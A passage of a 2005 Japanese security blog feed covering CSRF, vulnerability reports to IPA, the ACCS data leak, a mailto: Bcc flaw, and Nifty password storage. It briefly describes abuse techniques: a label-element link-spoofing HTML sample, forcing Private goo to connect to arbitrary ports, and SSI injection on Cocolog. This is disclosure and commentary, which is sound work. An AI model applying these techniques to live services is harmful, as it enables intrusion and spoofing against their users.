class="quote-and-cite"><blockquote><p>「クロスサイト・リクエスト・フォージェリ」は、ウェブサイトにアクセスすると自動的にログインするような機能を悪用して、そのウェブサイトの正規の利用者に対し、ユーザ登録内容の変更や意図しない商品購入などをさせるものです。「クロスサイト・リクエスト・フォージェリ」の対策としては、悪用しにくいユーザ登録フォームや商品購入フォームを設計する9ことなどが挙げられます。</p><p class="snip"><em>(～中略～)</em></p><p>9 この攻撃ではHTTP のGETメソッドが使われることが多いため、フォームの処理にPOSTメソッドのみを使用することで、悪用されにくくなります。</p></blockquote></div><p>いや、その注釈はちょっと……。POST メソッドで踏ませるのも難しいことではないと思いますし。Internet Watch の方では</p><div class="quote-and-cite"><blockquote><p>CSRF対策には、リファラーのチェックを行なうなどのWebサイト作成者や管理者による処置が必要だ。</p></blockquote><p class="cite">以上、SSIインジェクションやCSRFなどの新たな問題も～IPAの脆弱性届出状況 より</p></div><p>となっていて、こちらはまあ問題ないと思いますが。</p><p class="note">※CSRF に関して、個人的には「<em>パスワードを変更するようなフォームでは、必ず同時に旧パスワードを入力させるべし</em>」というのを強く訴えたいところですね。そうでないパスワード変更フォームが CSRF で攻撃されると何が起きるのかはすぐ分かると思いますが、同時に旧パスワードを入力する必要があれば大丈夫です。</p><p class="note">※2005-11-01 追記: 私が届け出ていた問題は修正されました。<a href="../topic/2440">CSRF 直った</a>参照。</p><p>面白いことに、脆弱性の類型にこんなものがあります。</p><div class="quote-and-cite"><blockquote><p>HTTPSの不適切な 利用</p><p>HTTPSによる暗号化をしているが、ユーザへの説明に間違いがある、または、ウェブサイトの設計上、ユーザから証明書が確認できない</p></blockquote><p class="cite">以上、ソフトウエア等の脆弱性関連情報に関する届出状況 [2005年第1四半期（1月～3月）] より</p></div><p>いや、私もこれは脆弱性なのかどうか微妙だと思ったのですが、試しに届け出てみたらあっさり受理されたという。</p><ul class="comment-link"><li><a href="../topic/2270/comment">「脆弱性届出状況2005年Q1」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/IPA">IPA</a> / <a href="../genre/JPCERT%EF%BC%8FCC">JPCERT/CC</a> / <a href="../genre/CSRF">CSRF</a> / <a href="../genre/%E6%83%85%E5%A0%B1%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%E6%97%A9%E6%9C%9F%E8%AD%A6%E6%88%92%E3%83%91%E3%83%BC%E3%83%88%E3%83%8A%E3%83%BC%E3%82%B7%E3%83%83%E3%83%97">情報セキュリティ早期警戒パートナーシップ</a></span></p></div></div></content></entry><entry><title>CSRF の議論</title><link href="http://bakera.jp/ebi/topic/2294" /><id>tag:bakera.jp,2008:/ebi/topic/2294</id><updated>2005-10-30T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2005/4/28">2005年4月28日(木曜日)</a></h1><div class="topic"><h2><a href="../topic/2294">CSRF の議論</a></h2><p class="subinfo"><span class="updated">更新: 2005年10月30日</span></p><p><a href="http://emk.name/">えむけいさん</a> <em class="domain-info">(emk.name)</em>にご指摘いただきましたが (ありがとうございます)、高木さんのところに「<a href="http://takagi-hiromitsu.jp/diary/20050427.html#p01">クロスサイトリクエストフォージェリ（CSRF）の正しい対策方法</a> <em class="domain-info">(takagi-hiromitsu.jp)</em>」という話が出ています。議論が深まるのは良いことですね。</p><p>用語「<dfn class="glossary"><a href="../../glossary/CSRF">CSRF</a></dfn>」の解説の誤解を招きそうな点を修正しておきました。</p><p class="note">※2005-10-30追記: しかし「GET でなくて POST 推奨」という話はホントにどこから出てきたのか謎すぎます。<a href="../topic/2270">IPA の 2005 年 Q1 の報告に書いてあった</a>のですが、その <a href="../topic/2440">IPA に届け出られた CSRF</a> は GET ではなく POST で動作するものなので……。</p><ul class="comment-link"><li><a href="../topic/2294/comment">「CSRF の議論」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/CSRF">CSRF</a></span></p></div></div></content></entry><entry><title>ACCS 事件の新解釈?</title><link href="http://bakera.jp/ebi/topic/2404" /><id>tag:bakera.jp,2008:/ebi/topic/2404</id><updated>2005-08-14T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2005/8/12">2005年8月12日(金曜日)</a></h1><div class="topic"><h2><a href="../topic/2404">ACCS 事件の新解釈?</a></h2><p class="subinfo"><span class="updated">更新: 2005年8月14日</span></p><p>「<a href="http://www.itmedia.co.jp/enterprise/articles/0508/12/news031.html">ネットワーク運用におけるセキュリティ：まずはセキュリティの基本的な考え方から理解する</a> <em class="domain-info">(www.itmedia.co.jp)</em>」という記事が出ていますが……。</p><div class="quote-and-cite"><blockquote><p>●コンピュータソフトウェア著作権協会（ACCS）</p><p>ACCSからの情報漏えいは、一般にはあまり知られていないかもしれないが、いくつかの点で非常に興味深い事件といえる。</p><p>この事件は、大学の研究者がACCSのWebサイトに存在するセキュリティホールを発見したことが発端だった。この研究者は、ACCSに対してセキュリティホールの存在を連絡したが、ACCSのWebサイト運用の委託者との行き違いもあり、対策は行われなかった。このため、彼はあるセミナーで、脆弱なWebサイトの事例としてACCSを紹介したのだが、この際に具体的なアクセス方法まで公開してしまった。こうして攻撃方法が第三者に公開されたことにより、ACCSのWebから個人情報が引き出され、公開されたことで事件となった。</p></blockquote></div><p>これってそんな事件でしたっけ? 私の認識とはだいぶ食い違っていますけれど……。</p><p>私の認識ではこんな感じ。</p><ul><li>office さんが ACCS に脆弱性を通知したのは、プレゼンの後。ACCS はプレゼンの時点では脆弱性の存在を認識していなかった (ただし、ファーストサーバは以前から脆弱性の存在を認識していた)。</li><li>セミナーで公開された攻撃方法を第三者が実践して個人情報が引き出された、という事実は確認されていない。アクセス記録が残っていた者のうち、少なくとも警察が捕捉した 3名に関しては csvmail.cgi のソースを表示しただけで、個人情報は引き出していないということになっている (他の4名については、どうであったか不明。また、OSコマンドインジェクションによってアクセス形跡ごと消されたものがあった可能性も否定できない)。</li><li>その後「公開された」のは個人情報のファイルそのものではなく、セミナー当日に使用されたプレゼン資料 (exploit 結果を解説する部分のキャプチャから個人情報が読み取れた)。</li></ul><p>個人的には、ACCS が脆弱性に気づかなかったことにはやむを得ない面があると思いますが、別の意味で教訓にすべき点があると思います。ほとんど誰も指摘していませんが、ASK ACCS ではあれだけの個人情報を必須項目にしていたにもかかわらず、SSL を使用していませんでした。これについては弁解の余地がないと思います。</p><p>結果的にパケット盗聴による漏洩は起きなかったのですが、「情報モラル」を提唱する組織としては個人情報に対する姿勢が甘すぎたと思いますし、この点はもっと厳しく問われても良かったのではないかと思います。</p><p class="note">※いや、実は漏洩していて発覚していないだけという可能性も否定できませんが。</p><p class="note">※2005-08-14 追記: 該当記事から、引用部分が丸ごと削除されているようです (こじまさん情報ありがとうございます)。「事実と違うだろ」ということで削除したのでしょうか。</p><ul class="comment-link"><li><a href="../topic/2404/comment">「ACCS 事件の新解釈?」へのコメント (4件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/ACCS">ACCS</a> / <a href="../genre/ASK%20ACCS%20%E5%80%8B%E4%BA%BA%E6%83%85%E5%A0%B1%E6%BC%8F%E6%B4%A9%E4%BA%8B%E4%BB%B6">ASK ACCS 個人情報漏洩事件</a> / <a href="../genre/SSL%EF%BC%8FTLS">SSL/TLS</a> / <a href="../genre/%E3%83%95%E3%82%A1%E3%83%BC%E3%82%B9%E3%83%88%E3%82%B5%E3%83%BC%E3%83%90">ファーストサーバ</a></span></p></div></div></content></entry><entry><title>MT で CSRF</title><link href="http://bakera.jp/ebi/topic/2038" /><id>tag:bakera.jp,2008:/ebi/topic/2038</id><updated>2005-07-18T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2004/11/1">2004年11月1日(月曜日)</a></h1><div class="topic"><h2><a href="../topic/2038">MT で CSRF</a></h2><p class="subinfo"><span class="updated">更新: 2005年7月18日</span></p><p>ちょいと Movable Type の話をしていて <a href="http://w3j.org/">yuuさん</a> <em class="domain-info">(w3j.org)</em>に教えていただいたのですが、Movable Type には <dfn class="glossary"><a href="../../glossary/CSRF">CSRF</a></dfn>攻撃の問題があるみたいですね。「<a href="http://hxxk.jp/mt/2004/09/13/2105">MT をインストールしたら真っ先に行うべきセキュリティ対策</a> <em class="domain-info">(hxxk.jp)</em>」</p><p class="note">※2005-07-18追記: リンク先の記事はパワーアップして移動しているようです : 「<a href="http://hxxk.jp/2005/05/13/2105">Movable Type における CSRF の可能性と各種対処法</a> <em class="domain-info">(hxxk.jp)</em>」</p><p>しかし、ちゃんと CSRF という名前があるのに全然出てこないというのが……。この名前はあんまり一般的ではないのかなぁ。</p><p class="note">※XSS に比べると遙かにマイナーだとは思いますが。ちなみに <dfn class="glossary"><a href="../../glossary/CSRF">CSRF</a></dfn> というのは "Cross-Site Request Forgeries" の略で、要するに「編集」「削除」などのコマンドを実行するような URL を踏ませる攻撃です。ふつうの人が踏んでも何も起きませんが、管理者権限でログイン済みの人が踏むとコマンドが実行されてしまったりするわけで。スクリプトが有効なら POST させることも簡単ですから、POST だからといって油断することもできません。</p><ul class="comment-link"><li><a href="../topic/2038/comment">「MT で CSRF」へのコメント (2件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/CSRF">CSRF</a> / <a href="../genre/Movable%20Type">Movable Type</a></span></p></div></div></content></entry><entry><title>mailto: URL で Bcc: が指定できてしまう問題</title><link href="http://bakera.jp/ebi/topic/2329" /><id>tag:bakera.jp,2008:/ebi/topic/2329</id><updated>2005-05-27T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2005/5/26">2005年5月26日(木曜日)</a></h1><div class="topic"><h2><a href="../topic/2329">mailto: URL で Bcc: が指定できてしまう問題</a></h2><p class="subinfo"><span class="updated">更新: 2005年5月27日</span></p><p>JVN で「<a href="http://jvn.jp/jp/JVN%23FCAD9BD8/index.html">JVN#FCAD9BD8 メールクライアントソフトにおける mailto URL scheme の不適切な解釈</a> <em class="domain-info">(jvn.jp)</em>」が公開されました。</p><p><span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/B000BO9MJA&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">Shuriken Pro</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=B000BO9MJA" alt="" width="1" height="1" /></span> についてはアップデートモジュールが公開されています……「<a href="http://www.justsystem.co.jp/shuriken/guide/update.html">特殊な mailto: URL を利用する際、お客様が意図しないメールが送信されてしまう現象について</a> <em class="domain-info">(www.justsystem.co.jp)</em>」。Pro でない Shuriken はノーサポートのようですが、それはもうライフサイクルが終わっているということなのでしょうね。</p><p>実はこの話、ニフティの FPROG で「mailto: URL で From: を指定する方法ってありますか?」という質問が出たのがきっかけだったりします。脊髄反射で「そんなことできたら脆弱性ですよね」みたいなコメントを書いたのですが、その後実際に鶴亀メールで試してみたらなんと指定できてしまったという。といっても「From: がダブっている」という旨の警告が出て送信はできませんでしたので、鶴亀メールについては問題ないと判断しましたが……他の <dfn class="glossary">MUA</dfn> はどうだろうということでいろいろ検証してみたところ、ほとんどの MUA では From: は指定できないものの、Bcc: が指定できることが分かりました。</p><p>多くの MUA では Bcc: が必ず表示されるという実装になっており、RFC2368 には反していますがまあ問題はないかな、と判断したのですが、Shuriken (Pro ではない、古いモノ) では Bcc: が表示されないまま送信されてしまうことが発覚したという次第です。</p><p>その後 Shuriken Pro を使用している方にご協力いただいて Pro でも再現することを確認しました。そして Shuriken Pro の脆弱性として届け出たのですが、それがいきなり<em>不受理</em>。IPA の方曰く:</p><div class="quote-and-cite"><blockquote><p>届出にありました「Bcc: の内容が表示されないこと」により第三者による悪用が可能になるということは認識しております。</p><p>ただし、以下の告示、ガイドラインの定義と照らし合わせた際に、今回の届出内容はソフトウェアにおける正規の挙動の一部であるため、ソフトウェアの機能や性能を損なうわけではなく、脆弱性ではないと判断しました。</p></blockquote></div><p>まあそんなものなのかな、と思っていたのですが、何がどうなったものか、一週間ほどして</p><div class="quote-and-cite"><blockquote><p>しかし、私どもで再度検討しましたところ、mailto スキームにおいて Bcc: を指定できてしまうこと自体は RFC 2386 に準拠しておらず、セキュリティ上好ましくない実装であり、この点において脆弱性であると判断し、取扱うことにいたしました。</p></blockquote></div><p>と、突如方針転換。そうして現在に至った感じです。</p><p class="note">※2005-05-27 追記:「RFC2386」は原文ママ。"The mailto URL scheme" の RFC は RFC2368 です。</p><p>そんなわけなので、実は当初の届出者の意図とはちょっと違う形で公開されていますが、まあそれはそれで良いかなと思います。</p><p class="note">※<a href="../topic/2270">前にも書きました</a>が、こういうのは「不受理」にはカウントされないみたいですね。</p><div class="amazon-list"><p /></div><ul class="comment-link"><li><a href="../topic/2329/comment">「mailto: URL で Bcc: が指定できてしまう問題」へのコメント (4件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/IPA">IPA</a> / <a href="../genre/JPCERT%EF%BC%8FCC">JPCERT/CC</a> / <a href="../genre/%E6%83%85%E5%A0%B1%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%E6%97%A9%E6%9C%9F%E8%AD%A6%E6%88%92%E3%83%91%E3%83%BC%E3%83%88%E3%83%8A%E3%83%BC%E3%82%B7%E3%83%83%E3%83%97">情報セキュリティ早期警戒パートナーシップ</a> / <a href="../genre/%E3%82%B8%E3%83%A3%E3%82%B9%E3%83%88%E3%82%B7%E3%82%B9%E3%83%86%E3%83%A0">ジャストシステム</a> / <a href="../genre/RFC">RFC</a></span></p></div></div></content></entry><entry><title>とある Wiki に XSS 脆弱性?</title><link href="http://bakera.jp/ebi/topic/2111" /><id>tag:bakera.jp,2008:/ebi/topic/2111</id><updated>2005-05-19T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2004/12/24">2004年12月24日(金曜日)</a></h1><div class="topic"><h2><a href="../topic/2111">とある Wiki に XSS 脆弱性?</a></h2><p class="subinfo"><span class="updated">更新: 2005年5月19日</span></p><p>某所のイントラネットでは、とある Wiki クローンが動いているのですが、なんか唐突に <dfn class="glossary"><a href="../../glossary/XSS">XSS</a></dfn> のような現象を発見。</p><p>私は Wiki のことは全く知らない素人ですので、Wiki に詳しそうなプログラマーである<a href="http://rryu.sakura.ne.jp/nisenise-fuhito/diary.html">りゅうさん</a> <em class="domain-info">(rryu.sakura.ne.jp)</em>、<a href="http://www.fprog.org/~mura-masa/diary/">むらまささん</a> <em class="domain-info">(www.fprog.org)</em>にちょっと訊いてみたのですが、</p><ul><li>プラグインの問題っぽいが、標準のプラグインなので普通に存在するはず</li><li>別な Wiki クローンでも再現</li><li>多くの Wiki に共通する問題である可能性が高く、影響範囲大</li><li>しかも対応困難</li></ul><p>というようなお話。感想としては「へぇ」という感じですが、まあ何とかする方向で。</p><p class="note">※2005-05-19 追記: この問題は JVN で「<a href="http://jvn.jp/jp/JVN%23465742E4/index.html">JVN#465742E4 Wiki クローンにおけるクロスサイトスクリプティングの脆弱性</a> <em class="domain-info">(jvn.jp)</em>」として公開されました。</p><ul class="comment-link"><li><a href="../topic/2111/comment">「とある Wiki に XSS 脆弱性?」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E8%84%86%E5%BC%B1%E6%80%A7">クロスサイトスクリプティング脆弱性</a></span></p></div></div></content></entry><entry><title>URL偽装系新技</title><link href="http://bakera.jp/ebi/topic/2175" /><id>tag:bakera.jp,2008:/ebi/topic/2175</id><updated>2005-05-12T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2005/2/17">2005年2月17日(木曜日)</a></h1><div class="topic"><h2><a href="../topic/2175">URL偽装系新技</a></h2><p class="subinfo"><span class="updated">更新: 2005年5月12日</span></p><p><a href="http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2005/02.html#20050217_IE">セキュリティホールmemoで紹介されていた</a> <em class="domain-info">(www.st.ryukoku.ac.jp)</em>、<a href="http://lists.netsys.com/pipermail/full-disclosure/2005-February/031773.html">[Full-Disclosure] IE/OE Restricted Zone Status Bar Spoofing</a> <em class="domain-info">(lists.netsys.com)</em>というお話。URL 偽装系の新技ですが、<dfn class="element"><a href="../../ref/html/element/label">label要素</a></dfn>がこう使えるとは盲点でした。</p><p>結構驚いたのですが、こんなのを書いてみると……</p><div class="sample"><p>&lt;p&gt;&lt;label for="foo"&gt;test&lt;/label&gt;&lt;/p&gt;<br />&lt;p&gt;&lt;a href="http://altba.com" id="foo"&gt;test2&lt;/a&gt;&lt;/p&gt;</p></div><p>IE の場合、ラベルの方をクリックしただけで遷移してしまいます。IE は <dfn class="element"><a href="../../ref/html/element/a">a要素</a></dfn>もコントロールとして扱っているということなのでしょうか。</p><ul class="comment-link"><li><a href="../topic/2175/comment">「URL偽装系新技」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/HTML">HTML</a></span></p></div></div></content></entry><entry><title>ニフティのパスワードは読み出し可能</title><link href="http://bakera.jp/ebi/topic/2293" /><id>tag:bakera.jp,2008:/ebi/topic/2293</id><updated>2005-05-06T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2005/4/28">2005年4月28日(木曜日)</a></h1><div class="topic"><h2><a href="../topic/2293">ニフティのパスワードは読み出し可能</a></h2><p class="subinfo"><span class="updated">更新: 2005年5月6日</span></p><p>ニフティを退会することにして、かわりに無料の @nifty ID というのに登録したのですが、今日になってその登録の通知が来ていました。これを開けてびっくり、なんとパスワードが書いてあります。私が ID を登録した時の初期パスワードはニフティ側で機械的につけられたものだったのですが、もちろんそんなパスワードは覚えられませんから、私はパスワードを変更したのです。実は登録直後は変更の方法も分からなくて、一日経ってから変更できることに気づいたという……。</p><p>驚いたことに、今日来た通知には私が変更した後のパスワードが記載されていたのですね。これはつまり、ニフティのサーバにはパスワードが生のままか、少なくとも復号可能な状態で保存されているということです。そしてシステム管理者はそれを印字できると。</p><p>これは非常に困ったことになりました。何故かというと、私が入れたパスワードは他のところでも共用していたりするものだからです。これは非常に迂闊でした。まさかパスワードが読み出せるシステムだとは思っていなかったので……。</p><p>とりあえず、私に送られてきた郵便物がどうやって作られて誰がそのパスワードを読み得たのかを問い合わせる必要がありますが、他の皆様 (誰?) には、<em>ニフティに登録したパスワードは読み出し可能であり、それは郵便物に印刷され得る</em>という事実をお知らせしておきます。もちろん、<em>他で使っているパスワードをニフティで使うことは決してしてはなりません。</em></p><p class="note">※追記: ひょっとすると読めるのは無料の「@nifty ID 登録ユーザー」のパスワードだけで、通常の有料会員のパスワードはちゃんと保護されているのかもしれません。そのあたりはちょっと分かりかねますが……。</p><p>まあ、とりあえず片っ端からパスワード変更ですな。</p><p class="note">※2005-05-06 追記: <a href="http://www.nifty.com/cs/pwreq.htm">@nifty:@nifty ID登録:パスワードの再発行</a> <em class="domain-info">(www.nifty.com)</em>を見ると、「弊社窓口にてご依頼を確認次第、 パスワード変更を行ない、ご登録住所宛に郵送にてお知らせいたします」とありますね。ユーザが入力したパスワードを印字して送っても問題ないという立場なら、現在のパスワードをそのまま送ってしまっても良いはずですが……。</p><ul class="comment-link"><li><a href="../topic/2293/comment">「ニフティのパスワードは読み出し可能」へのコメント (25件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/%E3%83%8B%E3%83%95%E3%83%86%E3%82%A3">ニフティ</a></span></p></div></div></content></entry><entry><title>プライベートgooで他人のサーバに繋ぐ</title><link href="http://bakera.jp/ebi/topic/702" /><id>tag:bakera.jp,2008:/ebi/topic/702</id><updated>2005-04-21T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2003/7/9">2003年7月9日(水曜日)</a></h1><div class="topic"><h2><a href="../topic/702">プライベートgooで他人のサーバに繋ぐ</a></h2><p class="subinfo"><span class="updated">更新: 2005年4月21日</span></p><p>某所で稼働している<a href="http://private.goo.ne.jp/">プライベートgoo</a> <em class="domain-info">(private.goo.ne.jp)</em> を使って altba.com のポート 25番を襲わせてみたら、見事に成功。</p><p>実はプライベートgoo では、CGI の稼働しているサーバと検索のデータベースを持つサーバとが分かれています。そしてここからが凄いのですが、検索データを拾ってくるサーバの名前とポート番号は、フォームのパラメータで指定するようになっているのです。そのため、これを適当な値に設定して POST してやると、CGI の稼働しているサーバは、任意のサーバの任意のポートに接続しに行ってくれます。</p><p class="note">※正確には「分かれている」のではくて「分けることができる」で、たいていの場合は localhost に接続しに行くように設定されています。</p><p class="note">※外向きの怪しいパケットはファイアウォールでフィルタされそうなものですが、CGI の動いているサーバが DMZ に置かれているためなのか、プライベート goo のこれがフィルタされたケースは見たことがありません。</p><p>これ、去年の3月に別の場所で<del>気づいて</del>ちょっと気になっていたのですが、未だにそのままなのですね。とりあえずファイアウォールの状態確認に使えたり、<dfn class="glossary"><a href="../../glossary/DoS">DoS</a></dfn> に使えたりする可能性がありますが、それほど問題ないのかしら。</p><p class="note">※2003-07-10 追記 : これ、よく考えたら私が自ら気づいたのではなくて、<a href="http://blog.keitap.com">keitap</a> <em class="domain-info">(blog.keitap.com)</em> さんに教えてもらった情報でした。</p><p>まあ、考えてみると <dfn class="glossary"><a href="../../glossary/Another%20HTML-lint">Another HTML-lint</a></dfn> のようなものだって任意のサーバの任意のポートにつなげたりするわけですし、それはそれで特に問題ないような気もしますね……。</p><p class="note">※2004-11-18 : 諸事情により内容を非公開としました。</p><p class="note">※2005-04-21追記 : 最新バージョンで修正されたようです。内容をふたたび公開しました。</p><ul class="comment-link"><li><a href="../topic/702/comment">「プライベートgooで他人のサーバに繋ぐ」へのコメント (2件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/Web">Web</a> / <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a></span></p></div></div></content></entry><entry><title>一覧見えてますけど……</title><link href="http://bakera.jp/ebi/topic/2267" /><id>tag:bakera.jp,2008:/ebi/topic/2267</id><updated>2005-04-19T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2005/4/17">2005年4月17日(日曜日)</a></h1><div class="topic"><h2><a href="../topic/2267">一覧見えてますけど……</a></h2><p class="subinfo"><span class="updated">更新: 2005年4月19日</span></p><p><a href="http://znz.s1.xrea.com/t/">ZnZさん</a> <em class="domain-info">(znz.s1.xrea.com)</em>の情報によると、ニフティの Web フォーラムの RSS は http://bbs.com.nifty.com/mes/FPROG_B001/index.rdf なんて URL で公開されているようです。知りませんでした。</p><p>それは良いのですが、その URL の末尾の index.rdf を削ると該当会議室そのものが見えるのだろうと期待して http://bbs.com.nifty.com/mes/FPROG_B001/ にアクセスしたら、期待に反して Not Found といわれてしまいました。あれ、と思ってさらに上の http://bbs.com.nifty.com/mes/ にアクセスしてみると、「/ のディレクトリの一覧」という謎のページが。</p><p>いちおう JSP のコードが読めたりするようではあります。幸か不幸か、個人情報が公開されているようなことはないようですので、意図して公開しているのかどうか判断がつきかねますが。</p><p class="note">※ディレクトリ一覧が見えているというだけでは、届け出ても「意図的に公開している可能性もあるので脆弱性とは判断できません」などと言われることがあります。個人情報が公開されているようなことがあれば意図的に公開されているのではないと判断できますので、確実に脆弱性として処理されます。ということで、発見者は個人情報等のデータが公開されていないか積極的に探さなければなりません。:-)</p><p class="note">※2005-04-19 追記: Not Found になったようです。ステータスが HTTP/1.1 404 /mes/ となっているのが謎ですが。しかし一覧が見えなくなっただけで、http://bbs.com.nifty.com/mes/memory.jsp などにはアクセスできるようですね。</p><ul class="comment-link"><li><a href="../topic/2267/comment">「一覧見えてますけど……」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/%E3%83%8B%E3%83%95%E3%83%86%E3%82%A3">ニフティ</a></span></p></div></div></content></entry><entry><title>ココログは SSI インジェクション可能</title><link href="http://bakera.jp/ebi/topic/2181" /><id>tag:bakera.jp,2008:/ebi/topic/2181</id><updated>2005-04-07T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2005/2/22">2005年2月22日(火曜日)</a></h1><div class="topic"><h2><a href="../topic/2181">ココログは SSI インジェクション可能</a></h2><p class="subinfo"><span class="updated">更新: 2005年4月7日</span></p><p><a href="../topic/2148">ココログにはビジネスユースもある</a>ということで 2件の脆弱性を届け出ていたのですが、2件とも取扱い終了となりました。</p><p>そのうちの 1件は SSI インジェクションの事例なのですが、ウェブサイト運営者はこれを脆弱性ではないと主張したようで、修正されないまま取扱い終了となっています。exec cmd は使えないようですので、大きな問題は無いといえば無いのかもしれませんが……ちょっとひっかかる感じがしますね。</p><p>まあ、ウェブサイト運営者が脆弱性でないと言うからにはテストしても問題ないでしょうし、情報を公開しても問題ないでしょう。近いうちに、どのようにしてココログに SSI がインジェクションできるのか、それで何ができるのかをまとめて書こうかなと思っています。</p><p class="note">※なお、もう 1件の方は確かに修正されていることを確認しました。今のところニフティからのアナウンスはないみたいですが……まあ、一生アナウンスされない可能性が高いですね。</p><p class="note">※2005-03-12 追記: 「近いうちに」と書きましたが、しばらく情報の公開を見送ります。先送りの理由は述べられませんが、お察しください。</p><p class="note">※2005-04-07 追記: ココログには任意のファイルが置けるようになりました。SSI を含む HTML をそのまんま置けますので、もはや技も何も必要なくなっています。</p><ul class="comment-link"><li><a href="../topic/2181/comment">「ココログは SSI インジェクション可能」へのコメント (2件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%83%8B%E3%83%95%E3%83%86%E3%82%A3">ニフティ</a> / <a href="../genre/%E3%82%B3%E3%82%B3%E3%83%AD%E3%82%B0">ココログ</a> / <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a></span></p></div></div></content></entry><entry><title>超立体マスクがない</title><link href="http://bakera.jp/ebi/topic/2236" /><id>tag:bakera.jp,2008:/ebi/topic/2236</id><updated>2005-04-06T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2005/4/3">2005年4月3日(日曜日)</a></h1><div class="topic"><h2><a href="../topic/2236">超立体マスクがない</a></h2><p class="subinfo"><span class="updated">更新: 2005年4月6日</span></p><p>花粉の時期ということでマスクを使用しているのですが、最後の一枚となったので買いに行くことに。</p><p>私が愛用しているのは「ユニ・チャーム超立体マスク花粉用やや大きめサイズ」なのですが……ない。ありません。薬局を 6件回りましたが、どこにもないのです。</p><p>仕方なく他の立体っぽいマスクを買ったのですが、呼吸すると鼻に吸い付いてくる感じでイマイチです。がっかりしていたところで、こんな記事を発見しました。</p><div class="quote-and-cite"><blockquote cite="http://www.tokyo-np.co.jp/00/sya/20050404/mng_____sya_____006.shtml"><p>花粉症に悩む人の中には人気商品を求め何軒も薬局を回る人も。家族に頼まれ、東京・神田の薬局で「超立体マスク」を探していた会社員男性（３９）は「もう何軒回ったか、分かりません。会社でも花粉症の上司が『超立体』が買えない、と嘆いていました」と話していた。</p></blockquote><p class="cite">以上、<a href="http://www.tokyo-np.co.jp/00/sya/20050404/mng_____sya_____006.shtml">満開！花粉商戦 人気商品は品切れ続出</a> より</p></div><p>しくしく。みんな買えないのね……。</p><p class="note">※2005-04-06 追記: <a 